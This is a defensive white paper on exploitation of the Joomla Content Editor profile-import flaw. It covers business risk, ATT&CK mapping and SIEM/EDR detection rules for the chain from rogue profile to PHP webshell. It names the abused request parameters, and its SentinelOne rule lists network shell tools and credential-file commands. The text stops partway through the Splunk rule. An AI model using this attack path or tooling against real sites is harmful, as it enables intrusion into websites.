Published by: CyberDax LLC
Author: Edward “Tony” Dolley
Role: Founder / Principal Threat Researcher, CyberDax LLC
Publication Date: June 17, 2026
Publication Type: Cybersecurity Research Report / White Paper

BLUF

‍  Joomla websites using vulnerable Joomla Content Editor extension versions are exposed to an actively exploited unauthenticated profile-import abuse path that can allow attackers to create rogue editor profiles, permit executable uploads, upload PHP payloads, and execute those payloads through web-accessible paths. The executive concern is not only whether JCE has been updated, but whether attackers already created rogue profiles, planted PHP files, modified upload behavior, accessed credentials, changed hosted content, or left server-side persistence before remediation.

Executive Risk Translation

This threat converts a trusted CMS editing extension into a server-side execution path. For organizations that depend on Joomla-hosted websites, customer portals, marketing sites, ecommerce pages, documentation sites, or hosted application front ends, compromise can create customer-facing defacement, phishing or malware hosting, credential exposure, database access risk, search-engine reputation damage, abuse-report handling, legal review, and emergency restoration burden. Leadership should treat this as a web integrity and compromise-validation issue, not as a routine CMS patch task.

S5 Executive Risk Summary

Business Risk

JCE profile-import abuse can undermine website integrity, CMS administrative trust, customer-facing content reliability, credential confidentiality, hosting-provider trust, and incident-response confidence. Business impact increases when affected Joomla properties support customer portals, ecommerce, regulated content collection, public communications, authentication-adjacent workflows, or brand-critical web presence.

Technical Cause

The issue involves unauthenticated abuse of Joomla Content Editor profile creation or import behavior that can allow attacker-controlled editor profile state and executable upload behavior. The durable detection issue is the sequence from suspicious JCE profile-import activity into PHP file placement, web-accessible execution, webshell behavior, credential access, content tampering, outbound callbacks, or abuse infrastructure activity.

Threat Posture

This is strategically significant for organizations with internet-facing Joomla sites using vulnerable JCE versions because public exploit logic exists, attacks are automated, active exploitation has been reported, and patching does not clean previously compromised sites. It should be treated as public-facing CMS extension abuse leading to PHP webshell execution exposure, not as a narrow version-compliance issue.

Executive Decision Requirement

Leadership should require immediate JCE update to the fixed release, preservation of web logs before rotation, review of JCE profile state, inspection of writable directories for unexpected PHP files, credential rotation where compromise is suspected, validation of hosted content integrity, malware scanning, backup comparison, WAF tuning, and deployment of the S25 detection logic across web, file, endpoint, WAF, proxy, DNS, hosting-control, and CMS telemetry where available.

S6 Executive Cost Summary

Joomla JCE profile-import abuse creates financial exposure because the organization must determine whether vulnerable public websites were only exposed, actively targeted, or already modified. The cost profile is higher than routine patching when the affected Joomla site supports customer acquisition, ecommerce, support workflows, regulated content, authentication-adjacent functionality, customer communications, or public brand trust.

Response cost is driven by emergency update validation, log preservation, JCE profile review, file-system inspection, PHP webshell hunting, malware scanning, credential rotation, backup comparison, WAF tuning, hosting-provider coordination, abuse-report handling, and customer-impact assessment.

Low Impact Scenario

Estimated $15K - $75K.

This scenario applies where vulnerable JCE exposure or suspicious requests are identified quickly, exploit attempts are blocked or unsuccessful, and web-log review, profile inspection, file-system scanning, and update validation confirm no rogue profile, unexpected PHP artifact, webshell execution, credential access, content tampering, outbound callback, or customer impact.

Moderate Impact Scenario

Estimated $75K - $400K.

This scenario applies where a rogue JCE profile, suspicious profile-import request, unexpected PHP file, suspicious upload-policy change, or uncertain webshell activity is found, but customer data, payment workflows, credentials, hosted content, and databases remain intact after validation. Response may require backup comparison, credential rotation, malware scanning, webroot review, hosting-provider coordination, WAF tuning, content review, and customer-facing assurance.

High Impact Scenario

Estimated $400K - $2.5M+.

This scenario applies where attackers executed PHP payloads, accessed Joomla configuration files, accessed database credentials, modified customer-facing content, hosted phishing or malware, used the server for spam or abuse, affected ecommerce or customer portals, compromised multiple Joomla properties, triggered legal review, required customer notification analysis, or forced emergency rebuild and restoration of web integrity.

S6A Key Cost Drivers

·        Number and importance of affected Joomla sites.

·        Whether affected sites support ecommerce, customer portals, regulated content, authentication-adjacent workflows, public communications, or brand-critical web presence.

·        Evidence of rogue JCE profiles, executable upload settings, unexpected PHP files, webshell access, credential-file access, database access, hosted-content tampering, outbound callbacks, phishing, malware hosting, spam, or abuse reports.

·        Availability and retention of web server access logs, WAF logs, reverse-proxy logs, CMS audit logs, file telemetry, endpoint process telemetry, FTP logs, hosting-control logs, DNS logs, and proxy logs.

·        Completeness of approved Joomla administrator, approved source, approved scanner, approved maintenance-window, approved deployment-user, and approved hosting-provider inventories.

·        Scope of credential rotation for Joomla administrators, database users, FTP users, hosting-control accounts, SSH users, API keys, mail accounts, and reused passwords.

·        Business disruption caused by emergency maintenance, site takedown, backup restoration, malware scanning, content validation, SEO cleanup, abuse-desk coordination, or customer communications.

·        Customer, contractual, regulatory, or legal exposure if credential access, database access, form-data exposure, payment-page tampering, customer-data access, or malware/phishing hosting cannot be ruled out.

S6B Compliance and Risk Context

Joomla JCE compromise may create compliance, contractual, privacy, payment, customer-notification, operational resilience, or public-trust exposure when attackers access customer data, credentials, databases, contact-form submissions, uploaded documents, mail-related assets, ecommerce records, payment-page content, authentication secrets, or regulated content.

Vulnerable-version status alone is not sufficient for breach determination. The governance question is whether the organization can prove that the site was not modified, backdoored, used for abuse, used to access credentials, or used to reach customer data during the exposure window.

Risk Register Entry

Risk Title

Joomla JCE Profile Import Abuse and PHP Webshell Execution Exposure

Risk Description

Attackers may abuse vulnerable Joomla Content Editor profile import behavior to create rogue editor profiles, permit executable upload types, upload PHP payloads, execute webshells, modify hosted content, access credentials, stage phishing or malware content, and force emergency website integrity review.

Likelihood

High for internet-facing vulnerable JCE deployments.

Impact

Moderate to Severe depending on hosted-content sensitivity, customer-facing dependency, credential exposure, database exposure, and evidence of post-exploitation activity.

Risk Rating

High

Annualized Risk Exposure

Estimated $75K - $500K for organizations with several externally facing Joomla sites and incomplete CMS, file, and web telemetry.

Exposure may exceed $500K - $2.5M+ where compromise affects ecommerce, regulated content, customer portals, multiple hosted Joomla properties, credential material, database access, phishing or malware hosting, abuse-report handling, legal review, customer communications, or public restoration of trust.

S10 Threat Overview

Joomla Content Editor profile-import abuse creates a practical mass-exploitation risk because vulnerable sites can be attacked without authentication, public exploit logic exists, automated attacks have been reported, and patching prevents re-entry without removing artifacts already created before remediation.

The threat centers on unauthenticated abuse of the JCE profile import workflow. The attacker-created profile state can permit executable upload behavior that should not be available to unauthenticated users. The attacker can then place PHP-like payloads in writable web-accessible locations and request those files over HTTP to trigger server-side execution.

This TTD treats the activity as public-facing CMS extension abuse leading to PHP webshell execution exposure, not as a narrow Joomla patching event.

S13 Targets and Exposure Surface

Primary Targets

Joomla websites using vulnerable Joomla Content Editor extension versions.

JCE profile import functionality.

Joomla public webroots, image folders, media folders, tmp folders, upload directories, cache directories, extension directories, and other writable locations that may be web accessible.

Joomla administrator accounts, database credentials, FTP accounts, hosting-control accounts, SSH accounts, mail accounts, API keys, and reused credentials.

Customer-facing websites, ecommerce pages, forms, portals, documentation sites, marketing pages, and hosted application front ends.

Higher-Risk Deployment Conditions

JCE is internet facing through a public Joomla site.

JCE is outdated or not centrally inventoried.

The site allows PHP execution from writable paths.

Joomla tmp, images, media, uploads, cache, or extension directories are web accessible.

Web logs are short-lived or query strings are not retained.

CMS administrative auditing is absent.

Endpoint process telemetry is unavailable on the web server.

Shared hosting limits access to file, process, FTP, or hosting-control telemetry.

Credential reuse exists across Joomla, database, FTP, hosting-control, mail, or SSH accounts.

Exposure Surface

Public Joomla application routes.

JCE profile-management and import paths.

Requests involving option=com_jce and task=profiles.import.

Writable directories that can receive uploaded files.

Web-accessible PHP execution paths.

Joomla configuration files.

CMS database tables storing editor profile state.

Web server service context.

FTP, hosting-control, file manager, backup, and deployment workflows.

DNS, proxy, firewall, and hosting-provider egress paths.

S17 MITRE ATT&CK Chain Flow Mapping

Stage 1: Public CMS Extension Exposure

The attacker reaches an internet-facing Joomla site running a vulnerable JCE extension version.

·        T1190 Exploit Public-Facing Application.

Stage 2: Unauthenticated Profile Import Abuse

The attacker abuses JCE profile import behavior to create or modify editor profile state without valid administrative authentication.

·        T1190 Exploit Public-Facing Application.

Stage 3: Executable Upload Enablement and PHP Payload Placement

The attacker uses rogue editor profile behavior to permit PHP or PHP-like file upload into a writable and web-accessible location.

·        T1105 Ingress Tool Transfer, applied when payload upload or staging is observed.

Stage 4: Server-Side PHP Execution and Webshell Behavior

The attacker requests the uploaded PHP-like file over HTTP and causes server-side execution from the web server context.

·        T1505.003 Server Software Component: Web Shell.

·        T1059.004 Command and Scripting Interpreter: Unix Shell, applied when shell execution is observed.

Stage 5: Credential, Content, and Hosting Abuse

The attacker may inspect Joomla configuration files, database credentials, webroot content, mail settings, hosted pages, backups, or other local files.

·        T1552.001 Unsecured Credentials: Credentials In Files.

·        T1083 File and Directory Discovery.

·        T1005 Data from Local System.

Stage 6: Customer-Facing Impact or Abuse Infrastructure

The attacker may modify hosted content, place phishing pages, host malware, create redirects, send spam, or damage public trust.

·        T1491.002 Defacement: External Defacement, applied when public-facing content is altered.

·        T1565.002 Stored Data Manipulation, applied when hosted files, CMS content, or deployment artifacts are modified.

Conditional Technique Notes

T1105 should only be applied where upload, staging, or transfer behavior is observed.

T1059.004 should only be applied where command execution, shell invocation, or interpreter execution is observed.

T1491.002 should only be applied where public-facing content is modified or defaced.

This TTD should not be mapped to ransomware, APT-specific techniques, or broad cloud-control-plane activity unless supporting telemetry connects those behaviors to the Joomla/JCE access path.

S18 Attack Path Narrative

An attacker identifies an internet-facing Joomla site using a vulnerable JCE extension version.

The attacker targets the JCE profile import workflow with unauthenticated requests involving JCE profile creation or import behavior.

The attacker creates or imports a rogue editor profile that enables upload of PHP or PHP-like content.

The attacker uploads a PHP payload into a writable path such as tmp, images, media, uploads, cache, or another web-accessible directory.

The attacker requests the uploaded PHP-like file over HTTP and triggers server-side execution.

The attacker may use the webshell to inspect Joomla configuration files, retrieve database credentials, modify hosted content, upload additional files, create persistence, stage phishing or malware content, generate outbound callbacks, or use the server for abuse infrastructure.

Defenders should detect this through correlated JCE profile-import requests, rogue CMS profile state, unexpected PHP files in writable paths, HTTP access to newly written PHP-like files, web server process anomalies, suspicious outbound communication, credential-file access, and hosted-content changes.

S20 TTP Analysis

Initial Access

Attackers abuse public-facing Joomla/JCE exposure without needing valid CMS credentials.

Execution

Execution occurs when a PHP-like payload is uploaded to a web-accessible location and requested through the web server, causing server-side PHP execution.

Persistence

Persistence may occur through rogue JCE profiles, additional PHP webshells, modified CMS files, hidden plugins, cron jobs, altered templates, malicious redirects, new administrator accounts, or hosting-control changes.

Privilege Escalation

Privilege escalation may occur if the web server user can read sensitive configuration files, write to executable locations, access database credentials, or interact with hosting-control tooling.

Defense Evasion

Attackers may use benign-looking profile names, normal Joomla paths, common upload directories, obfuscated PHP, double extensions, timestamp manipulation, temporary webshells, cleanup attempts, or web requests that resemble scanner or maintenance activity.

Credential Access

Attackers may access Joomla configuration files, database credentials, FTP credentials, hosting-control credentials, mail settings, API keys, environment files, backup archives, or reused passwords.

Discovery

Attackers may inspect directories, Joomla version state, extension versions, database tables, administrator users, content paths, writable locations, backup files, mail configuration, and hosting environment details.

Command and Control / Tool Transfer

Attackers may upload additional tooling, fetch remote payloads, connect to external infrastructure, or use the compromised site as a callback point.

Impact

Attackers may alter public content, host phishing or malware, inject redirects, stage spam infrastructure, compromise customer trust, damage SEO reputation, access customer data, or force emergency site restoration.

S20A — Adversary Tradecraft Summary

The durable tradecraft pattern is CMS profile-state conversion: unauthenticated JCE profile import abuse enables executable upload behavior, which is then converted into PHP payload placement, web-accessible execution, webshell activity, credential exposure, content tampering, or abuse infrastructure. Detection should focus on that sequence rather than a single CVE label, exploit string, scanner result, IP address, user agent, or file hash.

S21 Detection Strategy Overview

Detection Philosophy

Detect Joomla JCE exploitation through correlated behavior, not single indicators.

Primary Detection Anchors

Suspicious JCE profile-import requests, unauthenticated or unusual POST activity, new or modified JCE editor profiles, executable upload policy changes, PHP-like files in writable Joomla paths, HTTP access to recently created PHP-like files, web server service-context execution, sensitive Joomla file access, rare outbound communication, FTP or hosting-control anomalies, and hosted-content changes.

Detection Prioritization Model

Prioritize events where JCE profile-import activity is followed by PHP-like file placement, web access to that file, web server process execution, credential-file access, outbound callbacks, or hosted-content changes within a bounded time window.

Correlation Strategy (Strict Enforcement)

Do not promote scanner traffic, one request to com_jce, one unexpected PHP file, or cloud-only anomalies to high confidence without Joomla asset, request, file, process, CMS profile, source, user, or time-window correlation.

Telemetry Prioritization

Prioritize web access logs, WAF logs, reverse-proxy logs, CMS profile state, Joomla database change records, file-integrity telemetry, endpoint process telemetry, DNS logs, proxy logs, firewall logs, FTP logs, hosting-control logs, backup metadata, and asset inventory.

Detection Design Constraints

Avoid detection designs based only on CVE name, single request string, public exploit user agent, one IOC, vulnerable version status, or isolated scanner traffic.

Baseline and Deployment Requirements

Baseline approved administrators, admin source networks, hosting-provider support sources, vulnerability scanners, patch-validation tools, backup and migration jobs, deployment users, CI/CD upload workflows, maintenance windows, known PHP paths, normal Joomla extension behavior, and expected egress destinations.

Variant Resilience Requirements

Rules should remain useful for future Joomla/JCE or CMS extension abuse paths that produce the same operational behavior: profile or configuration abuse, executable upload enablement, suspicious PHP placement, webshell execution, credential access, and hosted-content tampering.

Operational Detection Model

Run detections in hunt mode first, tune exceptions, validate joins, verify triage fields, confirm web-log retention and query-string preservation, baseline approved administrative activity, then promote to alert mode.

Explicit Non-Deployment Guardrails

Do not deploy weak WAF-only rules as compromise detection. Do not claim webshell execution from vulnerable version status alone. Do not claim confirmed compromise from scanner traffic, generic web errors, unrelated PHP files, or uncorrelated outbound traffic. Do not attribute cloud, email, or hosting-control anomalies to JCE compromise without Joomla host, identity, source, file, or time-window linkage.

Figure

S22 Primary Detection Signals

Primary Detection Signals

POST requests involving option=com_jce and task=profiles.import.

JCE profile import requests from unauthenticated, unusual, external, or non-administrative sources.

JCE profile creation or modification outside approved maintenance.

JCE profiles permitting PHP, phtml, phar, or other executable file types.

Unexpected PHP-like files in tmp, images, media, uploads, cache, extension, template, or other writable paths.

HTTP GET or POST access to newly created PHP-like files in writable directories.

Web server service account spawning shell, scripting, transfer, archive, or network tools.

Access to Joomla configuration files, backup files, environment files, database dumps, or credential-bearing files after suspicious profile import or PHP access.

Supporting Detection Signals

Unusual user agents around profile import and PHP access.

HTTP 200, 206, 302, 403, 404, or 500 response patterns around import and execution attempts.

Repeated failed upload, profile import, or webshell-access attempts.

Outbound DNS, proxy, firewall, or EDR network activity from Joomla hosts to newly seen, rare, suspicious, or unapproved destinations.

FTP, file manager, hosting-control, or backup activity near suspicious web events.

New administrator accounts, modified templates, plugin changes, redirect changes, or unexpected CMS content updates.

Exploit Attempt and Instability Signals

Repeated requests to com_jce or profile import endpoints.

Unusual HTTP status patterns around JCE import requests.

Scanner-like activity followed by PHP file access.

Access to temporary file paths, uploaded archive paths, or PHP-like files with double extensions.

Outbound Communication Signals

DNS, proxy, firewall, or EDR network activity from Joomla web servers to rare, newly registered, unknown, suspicious, or unapproved destinations after suspicious PHP access.

Persistence and Post-Exploitation Signals (Conditional)

New or modified PHP files, templates, plugins, administrator accounts, scheduled tasks, cron entries, hidden files, backup archives, redirects, .htaccess rules, mail scripts, or webshell variants.

Lateral Movement and Expansion Signals (Conditional)

Use of Joomla, FTP, database, hosting-control, SSH, mail, or reused credentials against adjacent infrastructure.

Signal Usage Constraints

Do not treat a single signal as compromise confirmation. Promote confidence when signals align by Joomla asset, virtual host, source IP, user, path, file, process, destination, profile state, and time window.

S23 Telemetry Requirements

Required Telemetry

Web server access logs.

WAF logs.

Reverse-proxy logs.

Load-balancer logs where applicable.

Joomla asset inventory.

Installed JCE version inventory.

URI and query-string preservation.

Source IP and forwarded source IP fields.

HTTP method, URI path, query string, status code, user agent, request size, response size, virtual host, backend host, and timestamp.

File telemetry for Joomla webroot, images, media, tmp, upload, cache, template, plugin, extension, and backup paths.

Approved Joomla administrator lookup.

Approved administrator source-network lookup.

Approved scanner and validation-source lookup.

Approved hosting-provider support-source lookup.

Approved maintenance-window lookup.

Strongly Recommended Telemetry

Joomla administrative audit logs.

Joomla database change records for JCE profile state.

EDR or Linux audit telemetry from Joomla hosts.

Process creation and command-line telemetry.

File creation, modification, rename, read, and delete telemetry.

DNS logs.

Proxy logs.

Firewall logs.

EDR network telemetry.

FTP logs.

Hosting-control logs.

File-manager logs.

Backup and restore logs.

Database access logs.

Mail logs.

CMDB records.

Hosting-provider asset mapping.

Recently seen domain enrichment.

Domain reputation enrichment.

Known-good webroot baseline.

Approved deployment-user lookup.

Approved PHP path inventory.

Approved egress-destination lookup.

Local Mapping Required

Joomla site identifier.

Virtual host.

Backend host.

Source IP.

Forwarded source IP.

Authenticated CMS user where available.

HTTP method.

URI path.

Query string.

Status code.

User agent.

JCE profile identifier.

JCE profile name.

JCE upload policy.

File path.

File extension.

File hash where available.

File owner.

File action.

Process name.

Parent process.

Command line.

Process user.

Destination domain.

Destination IP.

FTP user.

Hosting-control user.

Maintenance-window status.

Approved administrator status.

Approved scanner status.

Approved deployment-user status.

Approved hosting-provider status.

Approved egress-destination status.

S24 Detection Opportunities and Gaps

Detection Opportunities

Suspicious JCE profile import activity can be correlated with PHP-like file placement, HTTP access to the file, web server process execution, sensitive file access, and outbound communication.

CMS profile-state review may directly identify rogue JCE profiles or executable upload policy changes.

File telemetry may reveal PHP payload creation even when web logs are incomplete.

WAF and reverse-proxy logs may preserve request-path evidence when application logs are incomplete.

Endpoint telemetry may reveal webshell execution through web server process lineage.

FTP, hosting-control, and backup logs may reveal post-exploitation cleanup, persistence, or restoration activity.

Detection Gaps

Web logs may rotate quickly.

Query strings may not be logged.

Joomla administrative audit logs may be absent.

CMS profile state may require database inspection rather than native audit telemetry.

Shared hosting may not expose process or file telemetry.

File timestamps may be unreliable after restore, migration, or attacker modification.

PHP execution restrictions vary by hosting configuration.

Endpoint telemetry may be unavailable on commodity web hosting.

Cloud logs alone cannot prove Joomla/JCE exploitation.

Compensating Controls

Use WAF logs, reverse-proxy logs, web server logs, CMS profile inspection, database review, file-system scanning, backup comparison, EDR, Linux audit, FTP logs, hosting-control logs, DNS logs, proxy logs, firewall logs, approved inventories, and maintenance records.

Do not rely only on JCE version validation if suspicious activity occurred during the exposure window.

S25 Ultra-Tuned Detection Engineering Rules

NDR / Network Behavioral Analytics

Detection Viability Assessment

Production-deployable where HTTP request metadata, WAF logs, reverse-proxy logs, URI paths, query strings, response status, virtual host, backend host, source identity, and egress telemetry can be joined to the same Joomla asset. Pure NetFlow is not sufficient because this detection requires JCE-specific URI and query-string visibility. Use NDR as a correlation layer when it can consume WAF, proxy, HTTP metadata, DNS, and asset-enrichment data.

Rule

Joomla JCE Profile Import Request With PHP Access or Rare Egress Correlation

Rule Format

Production-deployable NDR / WAF / reverse-proxy behavioral correlation pattern requiring local query-language translation.

Detection Purpose

Detect suspicious JCE profile import activity that aligns with PHP-like file access in writable Joomla paths, abnormal source context, suspicious response patterns, or rare outbound communication from the same Joomla host.

Detection Logic

Trigger when a Joomla asset receives POST activity involving option=com_jce and task=profiles.import from a source that is not an approved Joomla administrator source, approved scanner, hosting-provider support source, or approved validation workflow.

Assign medium severity when suspicious JCE profile-import activity occurs against a Joomla/JCE asset.

Assign high severity when suspicious JCE profile-import activity is followed within 60 minutes by HTTP access to a PHP-like file in tmp, images, media, uploads, cache, templates, plugins, or other writable paths on the same virtual host or backend host.

Assign high severity when suspicious JCE profile-import activity includes unusual source context, suspicious user agent, repeated failure-to-success pattern, or abnormal HTTP status sequence.

Promote to critical when suspicious JCE profile-import activity is followed within 120 minutes by rare outbound communication from the Joomla host, endpoint-confirmed web server process execution, sensitive file access, FTP or hosting-control abuse, hosted-content modification, phishing or malware hosting, or confirmed webshell artifact discovery.

Required Telemetry

WAF logs.

Reverse-proxy logs.

Load-balancer logs.

Web access logs.

HTTP request metadata.

DNS logs.

Proxy logs.

NDR session telemetry.

Joomla/JCE asset inventory.

Virtual host to backend host mapping.

Approved Joomla administrator source lookup.

Approved scanner lookup.

Approved hosting-provider support-source lookup.

Approved maintenance-window lookup.

Approved egress-destination lookup.

Recently seen destination-domain baseline.

Engineering Implementation Instructions

Map http_method, uri_path, query_string, full_url, source_ip, x_forwarded_for, user_agent, http_status, request_size, response_size, virtual_host, backend_host, backend_ip, joomla_site_id, src_host, dest_domain, dest_ip, dns_query, proxy_action, and timestamp.

Build ASSET_GROUP("joomla_jce_sites") from CMDB records, vulnerability management inventory, web platform inventory, DNS records, reverse-proxy routing, load-balancer target groups, cloud tags, hosting-provider records, and JCE version records.

Create APPROVED_JOOMLA_ADMIN_SOURCES, APPROVED_JOOMLA_SCANNERS, APPROVED_HOSTING_PROVIDER_SOURCES, APPROVED_JOOMLA_MAINTENANCE_WINDOWS, APPROVED_JOOMLA_VALIDATION_SOURCES, and APPROVED_JOOMLA_EGRESS_DESTINATIONS.

Validate that WAF, reverse proxy, CDN, load balancer, or web server logs preserve URI paths and query strings before enabling high-severity logic.

Translate the query pattern into the target NDR, WAF, SIEM, proxy, or detection platform syntax using local lookup and join functions.

Treat TLS termination, URI visibility, backend-host joins, virtual-host mapping, source-IP preservation, egress baselining, allowlist tuning, and SOC triage routing as required local deployment work.

DRI Assessment

High resilience where full URI/query visibility, Joomla asset inventory, virtual-host mapping, DNS/proxy telemetry, approved-source enrichment, and rare-destination baselining are available.

DRI

8.6 / 10

TCR Assessment

Operational confidence is moderate for standalone suspicious profile-import activity and high when profile-import activity aligns with PHP-like file access, rare egress, endpoint execution, CMS profile changes, or file-system evidence.

Operational TCR

8.1 / 10

Full-Telemetry TCR

9.2 / 10

Limitations

Encrypted traffic without WAF, reverse-proxy, CDN, or server-side HTTP logging may hide JCE URI and query strings. Attackers may use separate infrastructure for upload and execution. Legitimate validation, emergency remediation, or scanner workflows may touch JCE paths. Critical promotion requires local correlation to PHP access, file telemetry, endpoint telemetry, rare egress, CMS profile state, or hosting-control evidence.

Detection Query Pattern

Production-deployable behavioral pattern pending local query-language translation:

DATASETS:
ENV_WAF
ENV_REVERSE_PROXY
ENV_LOAD_BALANCER
ENV_WEB_ACCESS
ENV_DNS
ENV_PROXY

SCOPE:
backend_host IN ASSET_GROUP("joomla_jce_sites")

WINDOW:
60 minutes

SIGNAL suspicious_jce_profile_import:
http_method = "POST"
AND (
full_url CONTAINS "option=com_jce"
OR query_string CONTAINS "option=com_jce"
)
AND (
full_url CONTAINS "task=profiles.import"
OR query_string CONTAINS "task=profiles.import"
)
AND source_ip NOT IN LOOKUP("APPROVED_JOOMLA_ADMIN_SOURCES")
AND source_ip NOT IN LOOKUP("APPROVED_JOOMLA_SCANNERS")
AND source_ip NOT IN LOOKUP("APPROVED_HOSTING_PROVIDER_SOURCES")
AND maintenance_window = false

SIGNAL writable_path_php_access:
backend_host IN ASSET_GROUP("joomla_jce_sites")
AND http_method IN ("GET","POST")
AND uri_path MATCHES "(/tmp/|/images/|/media/|/uploads/|/cache/|/templates/|/plugins/).*(\.php|\.phtml|\.phar|php\.)"
AND http_status IN (200,206,302,403,404,500)

SIGNAL rare_joomla_host_egress:
src_host IN ASSET_GROUP("joomla_jce_sites")
AND dest_domain NOT IN LOOKUP("APPROVED_JOOMLA_EGRESS_DESTINATIONS")
AND dest_domain NOT IN LOOKUP("APPROVED_BUSINESS_DOMAINS")
AND (
dest_domain_age_days < ENV_NEW_DOMAIN_AGE_DAYS
OR domain_reputation IN ("unknown","suspicious","malicious")
OR dest_country NOT IN LOOKUP("APPROVED_EGRESS_COUNTRIES")
)
AND proxy_action IN ("allowed","proxied","connected")

CORRELATION:
suspicious_jce_profile_import NEAR (
writable_path_php_access
OR rare_joomla_host_egress
)
BY backend_host, virtual_host
WITHIN 60 minutes

OUTPUT:
backend_host
virtual_host
source_ip
x_forwarded_for
user_agent
uri_path
query_string
http_method
http_status
request_size
response_size
dest_domain
dest_ip
first_seen
last_seen

SentinelOne

Detection Viability Assessment

Production-deployable where SentinelOne covers Joomla web servers and captures process creation, parent process, command line, process user, file telemetry, and network telemetry. This rule is strongest on self-managed Joomla hosts, dedicated web servers, and container hosts where web server processes can be separated from normal deployment, backup, and maintenance activity.

Rule

Joomla Web Server Service Context Execution With Writable PHP Artifact or Rare Egress

Rule Format

SentinelOne Deep Visibility query pattern for Joomla host behavior requiring local field validation.

Detection Purpose

Detect suspicious web server service-context execution, PHP-like file creation, sensitive Joomla file access, or outbound tooling that may indicate PHP webshell execution after JCE profile-import abuse.

Detection Logic

Trigger when a Joomla host records PHP-like file creation or modification in writable paths and web server service-context execution, transfer-tool use, shell invocation, archive-tool use, encoded command behavior, credential-file access, or rare outbound network activity.

Assign medium severity for unexpected PHP-like file creation in Joomla writable paths.

Assign high severity when unexpected PHP-like file creation aligns with web server service-context process execution, suspicious command line, sensitive file access, or outbound connection.

Promote to critical when correlated with JCE profile-import web activity, known rogue JCE profile state, credential-file access, database dump activity, webroot tampering, phishing or malware hosting, FTP or hosting-control abuse, or confirmed webshell artifact discovery.

Required Telemetry

SentinelOne process telemetry.

SentinelOne command-line telemetry.

SentinelOne parent process telemetry.

SentinelOne file telemetry.

SentinelOne network telemetry.

Joomla web server endpoint group.

Joomla webroot path mapping.

Joomla service account mapping.

Approved deployment-user lookup.

Approved deployment-command lookup.

Approved maintenance-window lookup.

Approved backup and restore workflow lookup.

Approved egress-destination lookup.

Engineering Implementation Instructions

Map EndpointName, EndpointId, AgentUuid, ProcessName, ProcessImagePath, ParentProcessName, ParentProcessImagePath, ProcessUser, CmdLine, FilePath, FileEventType, DstIp, DstPort, DstDomain, and EventTime.

Create ENV_JOOMLA_WEB_SERVERS, ENV_JOOMLA_WEBROOT_PATHS, ENV_JOOMLA_WRITABLE_PATHS, and ENV_WEB_SERVER_SERVICE_USERS.

Validate local web server process names, including apache2, httpd, nginx, php-fpm, lsphp, php-cgi, cgi-fcgi, litespeed, openlitespeed, container runtime parent processes, and systemd service paths.

Create exceptions for approved deployments, backup scripts, CMS updates, JCE updates, plugin updates, migration jobs, malware scanning, emergency cleanup, hosting-provider maintenance, and vulnerability validation workflows.

Run in hunt mode before alert mode to baseline normal Joomla maintenance, deployment, plugin update, cache generation, image processing, backup, and restore behavior.

Treat endpoint grouping, webroot path mapping, service-account mapping, approved command exceptions, maintenance-window suppression, writable-path validation, and alert routing as required local deployment work.

DRI Assessment

High where Joomla hosts have SentinelOne coverage with process lineage, command-line, file, and network telemetry enabled.

DRI

8.8 / 10

TCR Assessment

Strong for suspicious web server execution and writable PHP artifact creation when scoped to Joomla hosts. Strongest when correlated with JCE profile-import web activity, CMS profile state, or WAF logs.

Operational TCR

8.4 / 10

Full-Telemetry TCR

9.3 / 10

Limitations

Legitimate Joomla deployments, plugin updates, backups, migrations, security scans, and emergency remediation may create or modify PHP files. Shared-hosting environments may not provide endpoint telemetry. This rule must be scoped to Joomla web servers and tuned against approved deployment workflows before alert-mode deployment.

Detection Query Pattern

SentinelOne Deep Visibility / STAR translation pattern with local field mapping and suppression implementation required:

EndpointName IN ENV_JOOMLA_WEB_SERVERS
AND (
ProcessUser IN ENV_WEB_SERVER_SERVICE_USERS
OR SrcProcName IN ("apache2","httpd","nginx","php-fpm","lsphp","php-cgi","cgi-fcgi","litespeed","openlitespeed")
OR SrcProcCmdLine CONTAINS "php-fpm"
)
AND (
(
FilePath MATCHES "(/tmp/|/images/|/media/|/uploads/|/cache/|/templates/|/plugins/).*(\.php|\.phtml|\.phar|php\.)"
AND FileEventType IN ("created","modified","renamed","written")
)
OR
(
TgtProcName IN (
"sh","bash","dash","zsh","python","python3","perl","ruby","php","curl","wget","nc","ncat","socat","ssh","scp","tar","zip","7z","openssl"
)
AND CmdLine NOT IN LOOKUP("APPROVED_JOOMLA_DEPLOYMENT_COMMAND_PATTERNS")
AND CmdLine NOT IN LOOKUP("APPROVED_JOOMLA_BACKUP_COMMAND_PATTERNS")
)
OR
(
CmdLine CONTAINS "configuration.php"
OR CmdLine CONTAINS "/var/www/"
OR CmdLine CONTAINS "/public_html/"
OR CmdLine CONTAINS "mysqldump"
OR CmdLine CONTAINS "base64"
OR CmdLine CONTAINS "curl "
OR CmdLine CONTAINS "wget "
OR CmdLine CONTAINS "bash -c"
OR CmdLine CONTAINS "/bin/sh -c"
OR DstDomain NOT IN LOOKUP("APPROVED_JOOMLA_EGRESS_DESTINATIONS")
)
)
AND maintenance_window = false

OUTPUT:
EndpointName
ProcessUser
SrcProcName
TgtProcName
CmdLine
ParentProcessName
FilePath
FileEventType
DstIp
DstDomain
EventTime

Splunk

Detection Viability Assessment

Production-deployable where Splunk ingests URI-preserving web logs, WAF or reverse-proxy logs, endpoint process telemetry, endpoint file telemetry, DNS/proxy logs, CMS audit or database change records where available, FTP logs, and hosting-control logs. Use normalized fields, lookups, bounded windows, and macros. Avoid broad raw searches across all web logs or unbounded joins.

Rule

Joomla JCE Profile Import Followed by Writable Path PHP Execution Evidence

Rule Format

Splunk SPL production correlation search with local index, sourcetype, macro, and lookup mapping.

Detection Purpose

Detect suspicious JCE profile-import activity followed by PHP-like file access, unexpected PHP file creation, web server service-context execution, sensitive Joomla file access, rare egress, or hosting-control activity.

Detection Logic

Trigger when suspicious JCE profile-import activity occurs and is followed within 60 minutes by one or more PHP execution or host-compromise signals on the same Joomla site, virtual host, backend host, or mapped asset.

Assign high severity when suspicious JCE profile-import activity aligns with writable-path PHP access, unexpected PHP file creation, web server service-context process execution, sensitive Joomla file activity, rare egress, FTP activity, or hosting-control activity.

Promote to critical when confirmed rogue profile state, credential-file access, database dump activity, webroot tampering, phishing or malware hosting, outbound callback behavior, or multiple-site compromise is observed.

Required Telemetry

Web access logs.

WAF logs.

Reverse-proxy logs.

Endpoint process logs.

Endpoint file logs.

DNS logs.

Proxy logs.

FTP logs where available.

Hosting-control logs where available.

Joomla CMS audit logs or database change records where available.

Approved Joomla administrator lookup.

Approved administrator source lookup.

Approved scanner lookup.

Approved hosting-provider support-source lookup.

Approved deployment-user lookup.

Approved maintenance-window lookup.

Approved egress-destination lookup.

Joomla/JCE asset lookup.

